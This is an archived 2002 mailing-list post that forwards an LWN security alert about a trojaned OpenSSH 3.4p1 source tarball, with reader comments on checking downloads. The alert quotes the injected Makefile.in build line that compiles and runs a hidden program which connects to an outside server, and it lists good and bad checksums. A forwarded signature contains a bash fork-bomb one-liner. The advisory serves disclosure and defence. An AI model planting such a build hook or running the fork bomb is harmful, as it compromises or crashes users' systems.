savannah-hackers
[Top][All Lists]
Advanced
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Savannah-hackers] OpenSSH 3.4p1 trojaned

From: Mark H. Weaver
Subject: [Savannah-hackers] OpenSSH 3.4p1 trojaned
Date: Thu, 01 Aug 2002 14:55:41 -0400 
http://lwn.net/Articles/6524/

[...]

Trojan horse in OpenSSH 3.4p1 source distribution

   From:      Mikael Olsson <address@hidden>
   To:        address@hidden
   Subject:   openssh-3.4p1.tar.gz distribution recently trojaned
   Date:      Thu, 01 Aug 2002 13:20:47 +0200


From
[27]http://docs.freebsd.org/cgi/getmsg.cgi?fetch=394609+0+current/freebsd-secur
ity

----- Forwarded message from Edwin Groothuis <address@hidden> -----

Date: Thu, 1 Aug 2002 16:55:51 +1000
From: Edwin Groothuis <address@hidden>
To: address@hidden
Subject: openssh-3.4p1.tar.gz trojaned

Greetings,

Just want to inform you that the OpenSSH package op ftp.openbsd.org
(and probably all its mirrors now) it trojaned:

    [28]ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz

The OpenBSD people have been informed about it (via email to
address@hidden and via irc.openprojects.org/#openbsd)


The changed files are openssh-3.4p1/openbsd-compat/Makefile.in:
 all: libopenbsd-compat.a
+       @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh
./bf-test.out &

bf-test.c[1] is nothing more than a wrapper which generates a
shell-script[2] which compiles itself and tries to connect to an
server running on 203.62.158.32:6667 (web.snsonline.net).

[1] [29]http://www.mavetju.org/~edwin/bf-test.c
[2] [30]http://www.mavetju.org/~edwin/bf-output.sh

This is the md5 checksum of the openssh-3.4p1.tar.gz in the FreeBSD
ports system:
    MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8

This is the md5 checksum of the trojaned openssh-3.4p1.tar.gz:
    MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57

Edwin

--
Edwin Groothuis      |            Personal website: [31]http://www.MavEtJu.org
address@hidden    |    Weblog: [32]http://www.mavetju.org/weblog/weblog.php
bash$ :(){ :|:&};:   | Interested in MUDs? [33]http://www.FatalDimensions.org/
   __________________________________________

   ([34]Log in to post comments)

     Trojan horse in OpenSSH 3.4p1 source distribution
   (Posted Aug 01, 2002 15:07 UTC (Thu) by craighagan) ([35]Post reply)

   This appears to be a FreeBSD ports thing. I build from
   sources downloaded from the openssh website within 24 hours
   of the release. I've double-checked said sources and
   do *not* see either the Makefile.in modification
   nor the bf-test.c source via find.

   I recommend other folks check their sources so that
   either the ports origin -- or a hack at openssh's distribution
   point can be confirmed.

     Trojan horse in OpenSSH 3.4p1 source distribution
   (Posted Aug 01, 2002 15:08 UTC (Thu) by craighagan) ([36]Post reply)

   silly me. i forgot that -ports ftp's the software upon build.

     Trojan horse in OpenSSH 3.4p1 source distribution
   (Posted Aug 01, 2002 16:22 UTC (Thu) by erat) ([37]Post reply)

   I built 3.4p1 last night from a tarball downloaded from openssh.com.
   No trojan found, and the checksum matched the "good" checksum from the
   security alert.

                     Copyright (©) 2002, Eklektix, Inc.
           Linux (®) is a registered trademark of Linus Torvalds
                 Web hosting provided by [38]Rackspace.com.

References

   1. http://lwn.net/
   2. http://php.lwn.net/corp/advertise/text/visit.php3?adid=382
   3. http://php.lwn.net/mediakit/index.php3?s=t
   4. http://lwn.net/login
   5. http://lwn.net/newaccount
   6. http://lwn.net/Articles/5712/
   7. http://lwn.net/Articles/5052/
   8. http://lwn.net/Articles/4553/
   9. http://lwn.net/Articles/4151/
  10. http://lwn.net/Articles/3668/
  11. http://lwn.net/Articles/6524/?format=printable
  12. http://lwn.net/
  13. http://lwn.net/current/
  14. http://lwn.net/Archives/
  15. http://lwn.net/security
  16. http://www.linuxcalendar.com/
  17. http://old.lwn.net/Distributions/
  18. http://old.lwn.net/Gallery/
  19. http://lwn.net/KernelPatches/
  20. http://old.lwn.net/stocks
  21. http://old.lwn.net/
  22. http://lwn.net/op/About.lwn/
  23. http://php.lwn.net/corp/donate/
  24. http://lwn.net/mediakit
  25. http://lwn.net/headlines/
  26. http://lwn.net/op/Privacy.lwn/
  27. 
http://docs.freebsd.org/cgi/getmsg.cgi?fetch=394609+0+current/freebsd-security
  28. ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz
  29. http://www.mavetju.org/~edwin/bf-test.c
  30. http://www.mavetju.org/~edwin/bf-output.sh
  31. http://www.MavEtJu.org/
  32. http://www.mavetju.org/weblog/weblog.php
  33. http://www.FatalDimensions.org/
  34. http://lwn.net/login
  35. http://lwn.net/Articles/6547/comment
  36. http://lwn.net/Articles/6550/comment
  37. http://lwn.net/Articles/6560/comment
  38. http://www.rackspace.com/
reply via email to
[Prev in Thread] Current Thread [Next in Thread]